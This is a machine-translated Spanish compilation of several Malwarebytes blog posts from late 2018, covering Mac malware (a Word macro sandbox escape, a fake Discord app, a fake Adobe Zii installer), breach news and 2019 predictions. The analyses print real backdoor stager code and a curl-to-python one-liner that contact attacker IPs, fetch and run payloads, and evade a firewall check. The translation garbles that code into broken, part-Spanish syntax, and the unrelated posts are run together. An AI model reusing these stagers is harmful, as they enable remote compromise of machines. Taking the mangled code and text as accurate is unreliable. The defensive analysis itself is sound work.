Ráfaga de nuevos malware para Mac cae en diciembre
Publicado: 11 de diciembre de 2018 por Thomas Reed
La semana pasada, escribimos sobre una nueva pieza de malware llamada DarthMiner . Resulta que había más cosas que ver, ya que no solo se habían detectado una, sino dos piezas de malware adicionales. El primero fue identificado por John Lambert de Microsoft y analizado por Patrick Wardle de Objective-See, y el segundo fue encontrado por Adam Thomas de Malwarebytes.
Por lo general, las macros en los documentos de Microsoft Office están en un espacio aislado, lo que significa que no deberían tener ninguna capacidad para realizar cambios en el sistema de archivos. Sin embargo, en este caso, el documento utiliza un escape de sandbox para crear un agente de inicio en el sistema. Este agente de inicio proporciona persistencia a un script de Python que configura una puertatrasera Meterpreter .
Curiosamente, este malware es un trabajo de copiar y pegar de una prueba de concepto publicada por Adam Chester en febrero, incluso para reciclar los identificadores que se refieren al sitio del blog de Chester, excepto que Chester formuló la hipótesis con EmPyre en lugar de Meterpreter como el puerta trasera.
Por supuesto, el ataque se basa en que el usuario abra un documento malicioso de Word y permita que se ejecuten las macros, por lo que la ingeniería social es la trampa principal. Mientras que nunca, nuncapermite que las macros se ejecuten en documentos de Microsoft Office, que está a salvo de este tipo de software malicioso.
Un imitador malicioso de la discordia.
El viernes, Adam Thomas encontró una copia maliciosa de Discord, una aplicación para que los jugadores se comuniquen con otros jugadores. Sin embargo, esta copia de Discord no parecía hacer nada, porque en realidad era un script de Automator que no hacía nada por el usuario.
La secuencia de comandos, que se muestra en el formulario editado anteriormente para ajustarse a una captura de pantalla, decodifica y ejecuta una carga útil de Python, luego comienza a tomar capturas de pantalla repetidamente y las carga en un servidor de comando y control (C&C).
La carga útil decodificada incluye un poco de código Python, incluidos dos fragmentos adicionales de Python codificado en base64. Uno de estos bits de código configura una puerta trasera EmPyre:
qPnQAZwbqBZ = 'PBlqIV'
import sys, urllib2; import re, subprocess; cmd = "ps -ef | grep Little \ Snitch | grep -v grep"
ps = subprocess.Popen (cmd, shell = True, stdout = subprocess.PIPE)
out = ps.stdout.read ()
ps.stdout.close ()
Si re.search ("Little Snitch", fuera):
sys.exit ()
o = __ importar __ ({2: 'urllib2', 3: 'urllib.request'} [sys.version_info [0]], fromlist = ['build_opener']). build_opener (); UA = 'Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.11; rv: 45.0) Gecko / 20100101 Firefox / 45.0 '; o.addheaders = [(' User-Agent ', UA)]; a = o.open (' http://37.1.221.204:8080 /index.asp '). read (); key =' 7b3639a4ab39765739a5e0ed75bc8016 '; S, j, out = range (256), 0, []
para i en rango (256):
j = (j + S [i] + ord (clave [i% len (clave)]))% 256
S [i], S [j] = S [j], S [i]
i = j = 0
para char en un:
i = (i + 1)% 256
j = (j + S [i])% 256
S [i], S [j] = S [j], S [i]
out.append (chr (ord (char) ^ S [(S [i] + S [j])% 256]))
exec (''. join (out))
La secuencia de comandos también configura un agente de inicio denominado com.apple.systemkeeper.plist , que mantiene de forma persistente el código de captura de pantalla y el código de puerta trasera EmPyre en ejecución.
Este malware no es realmente convincente, ya que no hace nada en absoluto para pretender que es una aplicación legítima de Discord. No es una copia maliciosamente modificada de la aplicación Discord. Ni siquiera incluye y lanza una copia de la aplicación Discord, que podría hacer fácilmente como un subterfugio para hacer que la aplicación parezca legítima. Para el caso, ¡ni siquiera usa un icono convincente!
En su lugar, el malware utiliza un icono genérico de applet de Automator, y todo lo que sucede cuando se ejecuta es que aparece un icono de engranaje en la barra de menú (como es normal en cualquier secuencia de comandos de Automator).
Por supuesto, cuando el usuario nota que algo está mal, el malware ha configurado el agente de inicio, abrió la puerta trasera y envió algunas capturas de pantalla. Muchos usuarios pueden notar que algo está apagado, pero es posible que no sepan qué hacer al respecto.
Similitudes interesantes
Hay algunas similitudes interesantes entre este malware falso de Discord, que Malwarebytes detecta como OSX.LamePyre , y el malware OSX.DarthMiner descubierto a principios de esta semana. Ambos se distribuyen en forma de applets de Automator, ambos ejecutan scripts de Python y ambos usan una puerta trasera EmPyre.
Sin embargo, también hay algunas diferencias. Los medios para ejecutar el script de Python son diferentes en estos dos casos. Además, el propósito primario aparente para el malware también es diferente: la criptomina, en el caso de DarthMiner, y las capturas de pantalla, en el caso de LamePyre.
Parece probable que estos puedan ser hechos por la misma persona, pero también es posible que uno sea un imitador de la otra.
El malware de macro de Word (que Malwarebytes actualmente detecta como OSX.BadWord , por falta de un nombre oficial) también configura una puerta trasera utilizando Python, y al igual que OSX.DarthMiner, ejecuta el código Python directamente en el agente de lanzamiento, que es algo inusual . Por supuesto, utiliza una puerta trasera diferente y un método de entrega diferente.
Los tres han hecho un uso intensivo del código prestado en forma de puertas traseras de código abierto (EmPyre en dos casos, el módulo Meterpreter de Metasploit en el tercero), así como copiar y pegar el código de vulnerabilidad VBA directamente desde el blog de un investigador.
Dos malware, un creador?
Las similitudes entre todos estos malware, así como la estrecha coincidencia en el tiempo (todos se enviaron por primera vez a VirusTotal en un período de aproximadamente un mes), pueden significar que todos fueron creados por el mismo desarrollador de malware.
Sin embargo, no hay evidencia concreta para esa suposición en este momento. Las direcciones IP con las que se comunican estas piezas de malware están distribuidas por todo el mundo en los EE. UU., Luxemburgo, Alemania y los Países Bajos, y no hay conexiones obvias entre ellas. El código es similar, pero no idéntico.
En este momento, estamos llamando a cada uno de ellos con un nombre diferente, pero seguiremos investigando.
Mientras tanto, las mejores cosas que puede hacer para mantenerse a salvo son:
No permitir que las macros se ejecuten en documentos de Microsoft Office
No descargue software de ningún otro sitio que no sea el sitio oficial del desarrollador, y especialmente no los sitios de piratería
No abra nada que le haya enviado por correo electrónico a menos que conozca al remitente y lo estuviera esperando.
Si abre una aplicación recién descargada y algo no funciona como se esperaba, consulte con el desarrollador
También publicamos el informe «Bajo el radar: el futuro del malware no detectado» , en el que examinamos las amenazas actuales y las tecnologías que no están preparadas para ellas. Puede descargar el informe directamente aquí .
Usuarios de iOS de EE. UU. Apuntados por campaña de publicidad maliciosa masiva. ScamClub, un grupo delictivo en línea poco conocido, secuestró 300 millones de sesiones de navegador para redirigir a los visitantes a sitios de adultos y estafas de tarjetas de regalo a través de códigos maliciosos colocados dentro de los anuncios que sirven. (Fuente: ZDNet)
¿Hacer un pago ransomware? Ahora puede violar las sanciones de Estados Unidos. Los afectados por el ransomware en los EE. UU. Tienen menos posibilidades de recuperar sus datos. El gobierno de EE. UU. Comenzó a penalizar a individuos y organizaciones por pagar a los actores de amenazas de ransomware. (Fuente: Bleeping Computer)
Nuevo giro a la estafa de abuelos: correo efectivo. En un informe, la Comisión Federal de Comercio (FTC, por sus siglas en inglés) advirtió a los usuarios sobre la tendencia creciente de las personas mayores de 70 años o más que se les acusa de enviar dinero a personas que pretenden ser sus nietos. (Fuente: La FTC)
Zoom parches error grave de videoconferencia. Se descubrió que Zoom, una popular herramienta de videoconferencia para empresas, tiene un error que, una vez explotado, puede dar a los atacantes la capacidad de tomar control de las computadoras que participan en una llamada de conferencia. Zoom ya parchó el error. (Fuente: Blog de seguridad desnuda de Sophos)
Los consumidores creen que los sitios de medios sociales representan el mayor riesgo para los datos. Según una encuesta realizada por Gemalto, la mayoría de los usuarios de Internet conscientes de la privacidad creen que los sitios web, en particular los sitios de redes sociales y bancos, no están protegiendo sus datos adecuadamente. Muchos de los encuestados también culpan a las empresas por cualquier violación de datos y es probable que se alejen de ellos y / o actúen en su contra. (Fuente: Help Net Security)
A principios de esta semana, descubrimos una nueva pieza de malware para Mac que combina dos herramientas de código abierto diferentes, la puerta trasera EmPyre y el cryptominer XMRig, con el propósito del mal.
El malware se distribuía a través de una aplicación llamada Adobe Zii. Adobe Zii es un software diseñado para ayudar en la piratería de una variedad de aplicaciones de Adobe. En este caso, sin embargo, la aplicación se llamaba Adobe Zii, pero definitivamente no era la cosa real.
Como se puede ver en las capturas de pantalla anteriores, el software real Adobe Zii, a la izquierda, utiliza el logotipo de Adobe Creative Cloud. (Después de todo, si va a escribir un software para ayudar a las personas a robar el software de Adobe, ¿por qué no robar el logotipo también?) Sin embargo, el instalador de malware utiliza un icono genérico de applet Automator.
Comportamiento
Al abrir la aplicación Adobe Zii falsa con Automator se revela la naturaleza del software, ya que simplemente ejecuta un script de shell:
curl https://ptpb.pw/jj9a | python - & s = 46.226.108.171: 80; curl $ s / sample.zip -o sample.zip; descomprimir sample.zip -d muestra; muestra de cd; cd __MACOSX; abrir -a sample.app
Esta secuencia de comandos está diseñada para descargar y ejecutar una secuencia de comandos de Python, luego descargar y ejecutar una aplicación llamada sample.app.
El sample.app es simple. Parece ser simplemente una versión de Adobe Zii, probablemente con el propósito de hacer que parezca que el malware es realmente «legítimo». (Esto no implica que la piratería de software sea legítima, por supuesto, sino que significa que el malware intentaba parecer que estaba haciendo lo que el usuario pensaba que tenía la intención de hacer.)
¿Qué pasa con el script de Python? Resultó estar ofuscado, pero se pudo desenfocar fácilmente, revelando el siguiente script:
import sys; import re, subprocess; cmd = "ps -ef | grep Little \ Snitch | grep -v grep"
ps = subprocess.Popen (cmd, shell = True, stdout = subprocess.PIPE)
out = ps.stdout.read ()
ps.stdout.close ()
Si re.search ("Little Snitch", fuera):
sys.exit ()
importar urllib2;
UA = 'Mozilla / 5.0 (Windows NT 6.1; WOW64; Trident / 7.0; rv: 11.0) como Gecko'; server = 'http: //46.226.108.171: 4444'; t = '/ news.php'; req = urllib2.Request (servidor + t);
req.add_header ('User-Agent', UA);
req.add_header ('Cookie', "session = SYDFioywtcFbUR5U3EST96SbqVk =");
proxy = urllib2.ProxyHandler ();
o = urllib2.build_opener (proxy);
urllib2.install_opener (o);
a = urllib2.urlopen (req) .read ();
IV = a [0: 4]; datos = a [4:]; clave = IV + '3f239f68a035d40e1891d8b5fdf032d3'; S, j, out = rango (256), 0, []
para i en rango (256):
j = (j + S [i] + ord (clave [i% len (clave)]))% 256
S [i], S [j] = S [j], S [i]
i = j = 0
para los datos de char:
i = (i + 1)% 256
j = (j + S [i])% 256
S [i], S [j] = S [j], S [i]
out.append (chr (ord (char) ^ S [(S [i] + S [j])% 256]))
exec (''. join (out))
Lo primero que hace este script es buscar la presencia de Little Snitch, un cortafuegos saliente de uso común que sería capaz de llamar la atención de los usuarios a la conexión de la red de puerta trasera. Si Little Snitch está presente, el malware se rescata. (Por supuesto, si se instalara un cortafuegos saliente como Little Snitch, ya habría bloqueado la conexión que habría intentado descargar este script, por lo que no vale la pena comprobar en este punto).
Este script abre una conexión a un backend de EmPyre, que es capaz de enviar comandos arbitrarios a la Mac infectada. Una vez que la puerta trasera está abierta, recibe un comando que descarga el siguiente script a /private/tmp/uploadminer.sh y lo ejecuta:
Este script descarga e instala los otros componentes del malware. Se creó un agente de lanzamiento llamado com.proxy.initialize.plist para mantener la puerta trasera abierta de forma persistente ejecutando exactamente el mismo script de Python ofuscado mencionado anteriormente.
El script también descarga el cryptominer XMRig y un archivo de configuración en la carpeta / Users / Shared /, y configura un agente de inicio llamado com.apple.rig.plist para mantener el proceso XMRig en ejecución con esa configuración activa. (El nombre de «com.apple» es una señal de alerta inmediata que fue la causa raíz del descubrimiento de este malware).
Curiosamente, hay un código en esa secuencia de comandos para descargar e instalar un certificado raíz asociado con el software mitmproxy, que es un software capaz de interceptar todo el tráfico web, incluido (con la ayuda del certificado) tráfico «https» cifrado. Sin embargo, ese código fue comentado, lo que indica que no estaba activo.
En la superficie, este malware parece ser bastante inofensivo. Los cryptominers normalmente solo hacen que la computadora se ralentice, gracias a un proceso que absorbe toda la CPU / GPU.
Sin embargo, esto no es sólo un cryptominer. Es importante tener en cuenta que el cryptominer se instaló a través de un comando emitido por la puerta trasera, y es muy posible que haya habido otras órdenes arbitrarias enviadas a Macs infectadas por la puerta trasera en el pasado. Es imposible saber exactamente qué daño podría haber hecho este malware a los sistemas infectados. El hecho de que solo hayamos observado el comportamiento de la minería no significa que nunca haya hecho otras cosas.
Trascendencia
Malwarebytes para Mac detecta este malware como OSX.DarthMiner. Si está infectado, es imposible decir qué otra cosa pudo haber hecho el malware además de criptominar. Es totalmente posible que pueda haber archivos exfiltrados o contraseñas capturadas.
Hay una lección importante que aprender de esto. Se sabe que la piratería de software es una de las actividades más riesgosas que puede realizar en su Mac. El peligro de infección es alto, y esto no es nuevo, sin embargo, las personas aún participan en este comportamiento. Por favor, en el futuro, hágase un favor y no piratee el software. Los costos pueden ser mucho más altos que comprar el software que intenta obtener de forma gratuita.
Como si no lo hayas escuchado lo suficiente, el panorama de amenazas está cambiando. Siempre está cambiando, y por lo general no es para mejor.
El nuevo malware que vemos que se está desarrollando y desplegando en la naturaleza tiene características y técnicas que les permiten ir más allá de lo que originalmente podían hacer, ya sea con el propósito de una infección adicional o la evasión de la detección.
Con ese fin, decidimos echar un vistazo a algunas de estas amenazas y desentrañar lo que hace que sean difíciles de detectar, quedando fuera de la vista y capaces de propagarse en silencio en toda la organización.
Luego examinamos qué tecnologías no están preparadas para estas amenazas, qué tecnología moderna es realmente efectiva contra estas nuevas amenazas y, finalmente, hacia dónde podría conducir la evolución de estas amenazas.
Las amenazas que discutimos:
Emotet
TrickBot
Sorebrect
Sam Sam
PowerShell, como un vector de ataque.
Al analizar estas amenazas, también observamos dónde se encuentran con mayor frecuencia en las regiones de EE. UU., APAC y EMEA.
Detecciones Emotet 2018 en los Estados Unidos.
Al hacerlo, descubrimos tendencias interesantes que crean nuevas preguntas, algunas de las cuales son claras y otras que necesitan más investigación. En cualquier caso, es evidente que estas amenazas no son antiguas, sino que se van haciendo más y más grandes salpicaduras a medida que avanza el año, de formas interesantes y, a veces, inesperadas.
Detecciones de ransomware Sorebrect en la región APAC
Aunque se desconoce la extensión y las capacidades de las amenazas futuras, tenemos que preparar a las personas para proteger sus datos y experiencias en línea. Desafortunadamente, muchas soluciones de seguridad antiguas no podrán combatir amenazas futuras, y mucho menos lo que está disponible ahora.
Sin embargo, no todas son malas noticias en materia de seguridad, ya que tenemos mucho a nuestro favor como en los desarrollos tecnológicos e innovaciones en las características modernas. Por ejemplo:
Detección de comportamiento
Bloqueo en la entrega
Modos de autodefensa
Estas características son efectivas para combatir las amenazas actuales y pronto serán necesarias para construir la base para futuros desarrollos, tales como:
Inteligencia artificial utilizada para desarrollar, distribuir o controlar malware.
El continuo desarrollo de malware sin archivos y «invisible».
Las empresas se están convirtiendo en alimento de gusanos para el futuro malware
Quora es una comunidad en línea que se centra en hacer y responder preguntas. Fue fundada en 2009 por dos ex empleados de Facebook.
Los datos robados pueden referirse a hasta 100 millones de usuarios de la plataforma e incluyen el nombre de usuario, la dirección de correo electrónico y la contraseña cifrada. En algunos casos, los datos importados de otras redes sociales y mensajes privados en la plataforma también se pueden haber tomado.
Para contrarrestar el abuso futuro de las credenciales de inicio de sesión, aconsejamos a los usuarios de Quora que cambien su contraseña y nos aseguremos de que la combinación de credenciales que usaron en Quora no se use en ningún otro lugar. A pesar de que Quora utilizó el cifrado y usó las contraseñas, no es prudente suponer que nadie podrá descifrarlas. Para aquellos que tienen la costumbre de reutilizar contraseñas en diferentes sitios, lea: ¿Por qué no necesita 27 contraseñas diferentes ?
Para aquellos que ya no quieran registrarse en Quora, también le recomendamos que consulte en Configuración y Desconecte todas y cada una de las Cuentas conectadas .
Un actor de amenazas logró obtener acceso a las cuentas de Dunkin ‘Donuts Perks. Las cuentas de Perks son un sistema de recompensa de lealtad de uso común. Dunkin ‘Donuts afirma que no hubo violaciones en sus sistemas, pero que las contraseñas reutilizadas fueron las culpables.
hemos sido informados de que terceros obtuvieron nombres de usuario y contraseñas a través de las brechas de seguridad de otras compañías y utilizaron esta información para iniciar sesión en algunas cuentas Dunkin ‘DD Perks.
Como contramedida, forzaron el restablecimiento de contraseñas para todos los clientes que la compañía cree que se vieron afectados. Si usted es uno de estos clientes, los actores de amenazas podrían haber aprendido su nombre y apellidos, las direcciones de correo electrónico, los números de cuenta de 16 dígitos de DD Perks y los códigos QR de DD Perks.
El puesto de avanzada canadiense del minorista de regalos de flores y alimentos gourmet informó sobre un incidente en el que un actor de amenazas pudo haber obtenido acceso a los datos de clientes de 75,000 pedidos canadienses, incluidos nombres e información de tarjetas de crédito, durante un período de cuatro años. A pesar de que la violación no afectó a ningún cliente en su sitio web de EE. UU., 1-800-Flowers.com, la compañía ha presentado una notificación ante la oficina del fiscal general en California.
La información de pago robada parece incluir números de tarjetas de crédito y toda la información relacionada: nombres, fechas de vencimiento y códigos de seguridad. Eso es realmente todo lo que un criminal experimentado necesita para saquear tu cuenta.
¿Tienes miedo de ser víctima de esta violación? Esto es lo que puedes hacer para evitar daños adicionales:
Revise sus cuentas bancarias y de tarjetas de crédito para detectar actividades sospechosas.
Considere una congelación de crédito si le preocupa que su información financiera haya sido comprometida.
Cuidado con las estafas relacionadas con infracciones; Los cibercriminales saben que esto es una violación masiva y de interés periodístico, por lo que aprovecharán la oportunidad de atrapar a los usuarios a través de la ingeniería social.
Algunas de las brechas recientes ocurrieron hace bastante tiempo o han estado en curso durante años, así que ¿por qué nos lo están diciendo ahora?
Posibles razones:
La nueva legislación obliga a las empresas a denunciar las infracciones.
Las infracciones ocurren todo el tiempo, pero son serias o grandes, por lo que los medios de comunicación hablan de ellas.
Cuando se emite una brecha grande, siempre verás unos pocos más pequeños, intentando esconderte en su sombra.
Si usted es un negocio que busca consejos para evitar ser golpeado por una infracción:
Invierta en un producto de protección de punto final y un programa de prevención de pérdida de datos para asegurarse de que las alertas sobre ataques similares lleguen a su personal de seguridad lo más rápido posible.
Eche un vistazo a su programa de gestión de activos:
¿Tiene un 100 por ciento de contabilidad de todos sus activos externos?
¿Tiene perfiles de usuario uniformes en su negocio para todos los casos de uso?
Cuando se trata de un movimiento lateral después de una brecha inicial, no puedes captar lo que no puedes ver. El primer paso para una mejor postura de seguridad es saber con qué tienes que trabajar.
En un mundo donde parece que las infracciones no pueden ser contenidas, los consumidores y las empresas una vez más tienen que lidiar con las consecuencias. Nuestro consejo a las organizaciones: No te conviertas en un cuento de advertencia. Guarde la molestia de sus clientes y salve la reputación de su empresa tomando medidas proactivas para asegurar su empresa hoy.
Querrá revisar su buzón si tiene una cuenta de Humble Bundle, ya que están notificando a algunos clientes un error que se utiliza para recopilar información de suscriptores.
Click para agrandar
El correo dice lo siguiente:
Hola,
La semana pasada, descubrimos que alguien estaba utilizando un error en nuestro código para acceder a información no personal limitada sobre las cuentas de Humble Bundle. El error no expuso las direcciones de correo electrónico, pero la persona lo explotó al probar una lista de direcciones de correo electrónico para ver si coincidían con una cuenta de Humble Bundle. Su dirección de correo electrónico fue una de las coincidencias.
Ahora, esta es la parte de un correo de incumplimiento / error donde tiendes a decir «Oh no, no otra vez» y respira profundamente. Luego ves cuánto de tu información personal se abrió camino hacia el atacante.
Oh no, no otra vez
Por una vez, su nombre, dirección e incluso sus datos de inicio de sesión están aparentemente en buenas manos. O bien este error no se expuso tanto como el atacante esperaba, o simplemente estaban en él para la colección de contenido de nicho.
El correo electrónico continúa:
La información confidencial, como su nombre, dirección de facturación, contraseña e información de pago NO fue expuesta. La única información a la que podrían haber accedido es su estado de suscripción de Humble Monthly. Más específicamente, pueden saber si su suscripción está activa, inactiva o en pausa;cuando su plan expira; y si ha recibido alguna bonificación por recomendación.
Debería explicar en este punto. Puedes comprar juegos de PC independientes en la tienda de Humble, o cualquier otro libro, juego u otra colección que se ofrezca esta semana. Alternativamente, puede suscribirse a la suscripción mensual. Con esto, pagas y luego cada mes te dan una selección aleatoria de títulos de videojuegos. Pueden ser buenos, malos o indiferentes. Es posible que ya tenga algunos, en cuyo caso puede regalarlos a otros. Si no tiene interés en los títulos de vista previa, puede pausar temporalmente su suscripción por un mes.
Estos son los datos que el explotador de errores ha obtenido, que es definitivamente una cosa extraña y específica para tratar de agarrar.
Consejos de seguridad de Humble Bundle
Volvamos al correo en este punto:
A pesar de que la información revelada es muy limitada, nos tomamos muy en serio la confianza del cliente y deseamos divulgarlo de inmediato. Queremos asegurarnos de que pueda protegerse si alguien utiliza la información recopilada para hacerse pasar por Humble Bundle.
Como recordatorio, aquí hay algunos consejos para mantener su cuenta privada y segura:
No comparta su contraseña, datos personales o información de pago con nadie. NUNCA pediremos información como esa.
Tenga cuidado con los correos electrónicos con enlaces a sitios desconocidos.Si recibe un correo electrónico sospechoso relacionado con Humble Bundle, contáctenos a través de nuestro sitio web de soporte para que podamos investigar más y advertir a otros.
Habilite la autenticación de dos factores (2FA) para que incluso si alguien obtiene su contraseña, no podrá acceder a su cuenta. Puede habilitar2FA siguiendo estas instrucciones .
Le pedimos disculpas por este error. Trabajaremos aún más para garantizar su privacidad y seguridad en el futuro.
Buen consejo, pero ¿cuál es la amenaza?
Uno podría adivinar que el gran riesgo aquí, entonces, es el potencial de phishing de lanza. Podrían explotar esto enviando correos a los suscriptores de que su suscripción está a punto de expirar, o reclamar problemas con los detalles de la tarjeta almacenada. Agregue un poco de texto en color con respecto a su suscripción «actualmente en pausa», y todo se verá convincente.
El phishing es un gran peligro en línea , y debemos hacer todo lo posible para frustrarlo. Si bien la información aquí expuesta no es tan mala como suele ser, todavía puede causar grandes dolores de cabeza. Esté atento a los dudosos correos de Humble, especialmente si mencionan suscripciones. Ayudará a evitar que tu manojo de alegría se convierta en un paquete de miseria.
LinkedIn violó la protección de datos al usar 18 millones de direcciones de correo electrónico de no miembros para comprar anuncios específicos en Facebook. (Fuente: TechCrunch)
Los investigadores crearon huellas digitales falsas «maestras» para desbloquear teléfonos inteligentes. (Fuente: placa base)
Uber abofeteó con una multa de £ 385K ICO por incumplimiento importante. (Fuente: InfoSecurty Magazine)
El desarrollador de Rogue infecta el módulo NodeJS ampliamente utilizado para robar Bitcoins. (Fuente: The Hacker News)
Cuando el FBI (y no los estafadores) crea un sitio web falso de FedEx. (Fuente: Graham Cluley)
Microsoft advierte sobre dos aplicaciones que instalaron certificados raíz y luego filtraron las claves privadas. (Fuente: ZDNet)
La aplicación de rastreo de redes sociales Predictim está prohibida en Facebook y Twitter. (Fuente: NakedSecurity)
Estafa de soporte técnico: centros de llamadas cerrados por la policía india en colaboración con Microsoft. (Fuente: TechSpot)
Alemania detecta nuevos ataques cibernéticos contra políticos, militares y embajadas. (Fuente: DW)
Es hora de cambiar su contraseña nuevamente, ya que Dell revela un intento de pirateo. (Fuente: Tendencias digitales)
Hoy, Marriott reveló una violación de datos a gran escala que afectó a 500 millones de clientes que se han alojado en un hotel con la marca Starwood en los últimos cuatro años. Si bien los detalles de la violación aún son escasos, Marriott declaró que no había acceso no autorizado a una base de datos vinculada a las reservas de los clientes desde el 2014 hasta el 10 de septiembre de 2018.
Para la mayoría de los clientes afectados (aproximadamente 327 millones), los datos violados incluyen una combinación de nombre, dirección postal, número de teléfono, dirección de correo electrónico, número de pasaporte, información de la cuenta de Starwood Preferred Guest, fecha de nacimiento, sexo, información de llegada y salida, Fecha de reserva, y preferencias de comunicación. Para algunos de esos invitados, se expusieron sus números de tarjeta de crédito y las fechas de vencimiento, sin embargo, se cifraron utilizando el Estándar de cifrado avanzado (AES-128) .
Puede leer más sobre el impacto para los clientes en la declaración de Marriott aquí .
Actualmente se desconoce la causa raíz de la violación, pero Marriott indicó que los intrusos cifraron la información antes de filtrar los datos. Brian Krebs informó que Starwood reportó su propio incumplimiento en 2015, poco después de la adquisición por parte de Marriott. En ese momento, Starwood dijo que su línea de tiempo de incumplimiento se extendió un año más o menos a noviembre de 2014. La remediación incompleta de los incumplimientos es extremadamente común, y cuando se complica con los desafíos de administración de activos introducidos por las fusiones y adquisiciones, se observa un movimiento lateral y una exfiltración después de un corte inicial. No es irrazonable.
Las propiedades de Starwood afectadas son las siguientes:
Westin
Sheraton
La colección de lujo
Cuatro puntos por el Sheraton
Hoteles W
St. Regis
Le Méridien
En alto
Elemento
Portafolio Tributo
Hoteles de diseño
Que deberias hacer al respecto?
Si eres cliente:
Cambie su contraseña para su programa Starwood Preferred Guest Rewards inmediatamente. Las contraseñas aleatorias generadas por un administrador de contraseñas de su elección deberían ser las más útiles.
Revise sus cuentas bancarias y de tarjetas de crédito para detectar actividades sospechosas.
Considere una congelación de crédito si le preocupa que su información financiera haya sido comprometida.
Cuidado con las estafas relacionadas con infracciones; Los ciberdelincuentes saben que esto es una violación masiva y de interés periodístico, por lo que aprovecharán la oportunidad de atrapar a los usuarios a través de la ingeniería social. Revisar los correos electrónicos supuestamente de Marriott con un ojo de águila.
Si usted es un negocio que busca consejos para evitar ser golpeado por una infracción:
Invierta en un producto de protección de punto final y un programa de prevención de pérdida de datos para asegurarse de que las alertas sobre ataques similares lleguen a su personal de seguridad lo más rápido posible.
Eche un vistazo a su programa de gestión de activos:
¿Tiene un 100 por ciento de contabilidad de todos sus activos externos?
¿Tiene perfiles de usuario uniformes en su negocio para todos los casos de uso?
Cuando se trata de un movimiento lateral después de una brecha inicial, no puedes captar lo que no puedes ver. El primer paso para una mejor postura de seguridad es saber con qué tienes que trabajar.
En un mundo donde parece que las infracciones no pueden ser contenidas, los consumidores y las empresas una vez más tienen que lidiar con las consecuencias. Nuestro consejo a las organizaciones: No te conviertas en un cuento de advertencia. Guarde la molestia de sus clientes y salve la reputación de su empresa tomando medidas proactivas para asegurar su empresa hoy.
El 27 de noviembre, el Departamento de Justicia de los Estados Unidos anunció la acusación de ocho personas involucradas en un caso importante de fraude publicitario que costó a los anunciantes digitales millones de dólares. La operación, denominada 3ve , fue la combinación de las botnets Boaxxe y Kovter, que el FBI, en colaboración con investigadores del sector privado, incluido uno de los nuestros en Malwarebytes, pudo desmantelar.
El aviso CERT de EE. UU. Indica que 3ve controlaba más de 1.7 millones de direcciones IP únicas entre Boaxxe y Kovter en un momento dado. Los actores de amenazas dependen de diferentes tácticas para generar tráfico y clics falsos, pero uno de los más comunes es infectar computadoras legítimas y hacer que imiten en silencio el comportamiento de un usuario típico. Al hacerlo, los estafadores pueden generar millones de dólares en ingresos al tiempo que erosionan la confianza en el negocio de la publicidad en línea.
Esta empresa criminal era bastante sofisticada ya que tenía muchas técnicas de evasión que no solo dificultaban la detección de fraudes publicitarios, sino que también limpiaban los sistemas afectados. Kovter, en particular, es una pieza única de malware que hace todo lo posible para evitar la detección e incluso para engañar a los analistas. Su naturaleza sin archivos para mantener la persistencia también lo ha hecho más difícil de deshabilitar.
Malwarebytes, junto con varias otras compañías, como Google, Proofpoint y la empresa de detección de fraude de anuncios White Ops , participaron en la investigación global de estas redes de bots de fraude de anuncios. Trabajamos con nuestros colegas en White Ops, compartiendo nuestra inteligencia y muestras del malware Kovter. Nos alegramos de poder aprovechar nuestra telemetría, que demostró ser valiosa para que otros puedan actuar.
Si bien las empresas cibercriminales pueden ser bastante sofisticadas, esta operación exitosa demuestra que los esfuerzos concertados entre los sectores público y privado pueden derrotarlos y llevar a los responsables ante la justicia.
El informe completo de 3ve, coautor de Google y White Ops, con contribuciones técnicas de Proofpoint y otros, se puede descargar aquí .
Cada año, en Malwarebytes Labs nos gusta mirar nuestra bola de cristal y predecir el futuro del malware.
Bueno, tal vez no tengamos una bola de cristal, pero sí tenemos años y años de experiencia observando tendencias y detectando cambios en los patrones. Sin embargo, cuando se trata de seguridad, solo podemos saber mucho. Por ejemplo, garantizamos que habrá algún tipo de desarrollo en el que tengamos una indicación de cero. También podemos asegurarle que las filtraciones de datos seguirán ocurriendo, justo cuando el sol sale y se pone.
Y si bien toda la esperanza es para un 2019 libre de malware, la realidad probablemente se parecerá más a esto:
Las nuevas infracciones de alto perfil empujarán a la industria de la seguridad a resolver finalmente el problema del nombre de usuario / contraseña. El enigma ineficaz de nombre de usuario / contraseñaha afectado a los consumidores y las empresas durante años. Hay muchas soluciones por ahí (criptografía asimétrica, biométrica, blockchain, soluciones de hardware, etc.), pero hasta ahora, la industria de la ciberseguridad no ha podido establecer un estándar para solucionar el problema. En 2019, veremos un esfuerzo más concertado para reemplazar las contraseñas por completo.
Las botnets IoT llegarán a un dispositivo cerca de ti. En la segunda mitad de 2018, vimos varios miles de enrutadores MikroTik pirateados para servir a los mineros de la moneda. Esto es solo el comienzo de lo que probablemente veremos en el nuevo año, con más y más dispositivos de hardware comprometidos para servir todo, desde cryptominers hasta troyanos. Se producirán compromisos a gran escala de enrutadores y dispositivos IoT , y son mucho más difíciles de parchar que las computadoras. Incluso solo la aplicación de parches no soluciona el problema, si el dispositivo está infectado.
El skimming digital aumentará en frecuencia y sofisticación. Los ciberdelincuentes buscan sitios web que procesan pagos y comprometen la página de pago directamente. Ya sea que compre patines o entradas para conciertos, cuando ingrese su información en la página de pago, si el software del carrito de la compra es defectuoso, la información se envía en texto claro, lo que permite a los atacantes interceptar en tiempo real. Las compañías de seguridad vieron evidencia de esto con los hacks de British Airways y Ticketmaster.
Microsoft Edge será un objetivo principal para los nuevos ataques de día cero y los kits de explotación. Con la transición de IE, Microsoft Edge está ganando más cuota de mercado. Esperamos ver más vulnerabilidades de Edge cuando sigamos con este navegador de próxima generación. Firefox y Chrome han hecho mucho para reforzar su propia tecnología, haciendo de Edge el próximo gran objetivo.
EternalBlue o un imitador se convertirán en el método de facto para propagar malware en 2019.Debido a que puede propagarse, EtnernalBlue y otros en la vulnerabilidad de SMB presentan un desafío particular para las organizaciones, y los ciberdelincuentes explotarán esto para distribuir nuevo malware.
La criptografía en las computadoras de escritorio, al menos en el lado del consumidor, casi morirá. Nuevamente, como vimos en octubre (2018) con los enrutadores MikroTik hackeados para servir a los mineros, los ciberdelincuentes simplemente no están obteniendo valor al apuntar a los consumidores individuales con cryptominers. En cambio, los ataques que distribuyen a los cryptominers se centrarán en plataformas que pueden generar más ingresos (servidores, IoT) y se desvanecerán de otras plataformas (minería basada en el navegador).
